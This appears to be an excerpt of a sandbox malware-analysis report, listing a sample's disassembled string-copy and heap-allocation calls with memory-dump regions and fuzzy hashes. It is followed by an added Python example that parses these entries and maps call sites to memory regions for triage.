                                  • Part of subcall function 006B7D40: std::_Xinvalid_argument.LIBCPMT ref: 006B7D76
                                  • Part of subcall function 006B7D40: std::_Xinvalid_argument.LIBCPMT ref: 006B7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 8717abf4bf546a92b87e21ded92315885d0a0902d754601c2f14164c7f451835
                                • Instruction ID: 6e48c7c210b91c4f4ff748dd0c921db18e32470788896a2d9ddd389f90e88253
                                • Opcode Fuzzy Hash: 8717abf4bf546a92b87e21ded92315885d0a0902d754601c2f14164c7f451835
                                • Instruction Fuzzy Hash: 3B31B8B23086144FD7249E6CE8809EAFBE7DFD1750B20466EF5458B741D7719CC18398
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 006A6F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006A6F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: 51dee3b1ee002a6f7bb36d17f0bfc75064dbcbdd2db686169869479b89a0a883
                                • Instruction ID: d635df6fdfc77b6bce347cd604623529dedc13eabc7e6fca5bb852d6b549ad3e
                                • Opcode Fuzzy Hash: 51dee3b1ee002a6f7bb36d17f0bfc75064dbcbdd2db686169869479b89a0a883
                                • Instruction Fuzzy Hash: E7216FB16006019FDB209F20DC84BB673EAEB41705F484978F996CB685EB75ED45CB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C244C
                                • lstrlen.KERNEL32(00000000), ref: 006C24E9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2570
                                • lstrlen.KERNEL32(00000000), ref: 006C2577
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: fe82443ef00c0a81f25a3d5b4dc9805b2d3d6b2d937d4f28780daa3767e671a3
                                • Instruction ID: 1532420b041bab2862120e3ecd5dd33e5f87122d81bdb2cf144a006a64d1c5bc
                                • Opcode Fuzzy Hash: fe82443ef00c0a81f25a3d5b4dc9805b2d3d6b2d937d4f28780daa3767e671a3
                                • Instruction Fuzzy Hash: 8F81A1B1E002069BDB14DF99D864BAEB7B6FF84300F18816DE908A7381EB759D45CB94
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 006C15A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C15D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1611
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1649
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: b2a9f0f2ef596ca75f1e486c4636fe6260dd305e4f8829ab0a3b46ea45ac947b
                                • Instruction ID: c4b30ece5c2ad04be747773af80d95b8b080cf5267efa60895d7223ae50a0a22
                                • Opcode Fuzzy Hash: b2a9f0f2ef596ca75f1e486c4636fe6260dd305e4f8829ab0a3b46ea45ac947b
                                • Instruction Fuzzy Hash: F221DAB4611B029BD725EF2AD454B27B7E6FF46700B444A1DA49ACBB41EB34E841CF90
                                APIs
                                  • Part of subcall function 006A1610: lstrcpy.KERNEL32(00000000), ref: 006A162D
                                  • Part of subcall function 006A1610: lstrcpy.KERNEL32(00000000,?), ref: 006A164F
                                  • Part of subcall function 006A1610: lstrcpy.KERNEL32(00000000,?), ref: 006A1671
                                  • Part of subcall function 006A1610: lstrcpy.KERNEL32(00000000,?), ref: 006A1693
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1557
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1579
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A15FF
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 29e1bd4bb016fc9d7e575d4666a3365e4e77cfd6795df7d8ea863369355ca0f8
                                • Instruction ID: a83008f81f4569a0488f0a599241d960ef831deca1cb32898900893fcab3959b
                                • Opcode Fuzzy Hash: 29e1bd4bb016fc9d7e575d4666a3365e4e77cfd6795df7d8ea863369355ca0f8
                                • Instruction Fuzzy Hash: 1331A6B4A11B029FC764EF3AC558956B7E5BF4A705B04492EA896C7B10DB34F811CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 006A162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1671
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1693
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 423666991059cf1bb62082bc2abf25450ea0520bb6f260fb7fdc612c97a7622c
                                • Instruction ID: 4bc32896d64585dc3a943f1c9ffc32c4f8c0eb57bcfbc5da8d0755f7e8e29233
                                • Opcode Fuzzy Hash: 423666991059cf1bb62082bc2abf25450ea0520bb6f260fb7fdc612c97a7622c
                                • Instruction Fuzzy Hash: 17110D74A127039BDB24AF3AD418927B7FABF46701B08062DA49AC7B40EB34EC018F54
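The entries above record lstrcpy call sites (ref addresses), the enclosing subcall function where one is named, the memory dump regions the function was recovered from, and a fuzzy hash for cross-sample similarity. The following Python is an added example, not part of this report or of Joe Sandbox, for turning such entries into structured records so the call sites can be mapped onto the dump regions listed beside them. The sample lines are constructed to match the shape shown on this page. Two assumptions are made and marked in the code: that the fourth dotted field of a .sdmp name is the region base address and the fifth is a Windows PAGE_* protection value (the page's entries are consistent with this, but do not state it), and that region extents can be approximated by taking the nearest lower base, since sizes are not listed.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input shaped like the report's disassembly entries on
# this page (API references, dump descriptors, fuzzy hash). Not real tool
# output; built for this example.
SAMPLE = """\
• lstrcpy.KERNEL32(00000000), ref: 006A162D
• lstrcpy.KERNEL32(00000000,?), ref: 006A164F
• Part of subcall function 006A1610: lstrcpy.KERNEL32(00000000,?), ref: 006A1671
• Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
• Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
• Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
• Instruction Fuzzy Hash: 1331A6B4A11B029FC764EF3AC558956B7E5BF4A705B04492EA896C7B10DB34F811CF90
"""

API_RE = re.compile(
    r"(?:Part of subcall function (?P<callee>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]{8})"
)
DUMP_RE = re.compile(
    r"(?P<kind>Source File|Associated): (?P<name>[0-9A-Fa-f]+(?:\.[0-9A-Fa-f]+){7}\.sdmp)"
)
FUZZY_RE = re.compile(r"Instruction Fuzzy Hash: (?P<hash>[0-9A-F]+)")

# Documented Windows PAGE_* constants. ASSUMPTION: the fifth dotted field of a
# dump name carries this value; the page's entries fit, but do not say so.
PAGE_PROTECT = {
    0x04: "PAGE_READWRITE",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: tuple
    ref: int                 # call-site address from "ref:"
    callee: Optional[int]    # enclosing subcall function, if the line names one


@dataclass(frozen=True)
class DumpRegion:
    kind: str
    base: int                # ASSUMPTION: fourth dotted field is the region base
    protect: int             # ASSUMPTION: fifth dotted field is the protection
    name: str

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:02X}")


def parse_api_ref(line: str) -> Optional[ApiRef]:
    m = API_RE.search(line)
    if not m:
        return None
    args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
    callee = int(m["callee"], 16) if m["callee"] else None
    return ApiRef(m["api"], m["module"], args, int(m["ref"], 16), callee)


def parse_dump(line: str) -> Optional[DumpRegion]:
    # The regex stops at ".sdmp", so trailing page residue such as
    # "Download File" is ignored.
    m = DUMP_RE.search(line)
    if not m:
        return None
    fields = m["name"].split(".")
    return DumpRegion(m["kind"], int(fields[3], 16), int(fields[4], 16), m["name"])


def parse_block(text: str) -> dict:
    """Collect API references, dump regions and the fuzzy hash from one entry."""
    apis, dumps, fuzzy = [], [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if (r := parse_api_ref(line)) is not None:
            apis.append(r)
        elif (d := parse_dump(line)) is not None:
            dumps.append(d)
        elif (f := FUZZY_RE.search(line)) is not None:
            fuzzy = f["hash"]
    return {"apis": apis, "dumps": dumps, "fuzzy": fuzzy}


def region_for(addr: int, dumps: list) -> Optional[DumpRegion]:
    """Nearest region whose base is at or below addr. ASSUMPTION: regions do
    not overlap, and sizes (absent from the page) are approximated this way."""
    below = [d for d in dumps if d.base <= addr]
    return max(below, key=lambda d: d.base) if below else None


if __name__ == "__main__":
    parsed = parse_block(SAMPLE)
    for call in parsed["apis"]:
        region = region_for(call.ref, parsed["dumps"])
        where = region.protect_name if region else "unmapped"
        print(f"{call.api}@{call.ref:08X} args={call.args} region={where}")
```

Mapping the lstrcpy call sites onto the dump regions shows them landing in a region whose protection field is 0x40, which under the stated assumption is PAGE_EXECUTE_READWRITE; a writable-and-executable region containing the code that triages these calls is worth noting when deciding whether the call sites belong to the original image or to unpacked code.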